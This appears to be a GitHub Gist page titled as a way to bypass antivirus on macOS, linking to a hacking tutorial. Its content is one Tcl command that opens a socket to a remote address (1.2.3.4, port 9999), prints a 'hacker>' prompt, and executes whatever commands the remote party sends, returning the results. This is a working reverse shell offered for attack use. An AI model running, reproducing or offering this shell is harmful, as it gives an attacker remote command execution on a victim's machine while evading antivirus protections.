Created
April 20, 2019 08:10
-
-
Save tokyoneon/e4259e2e6287a27487fe78624eccfd0c to your computer and use it in GitHub Desktop.
Use One Tclsh Command to Bypass Antivirus #macOS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/ | |
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment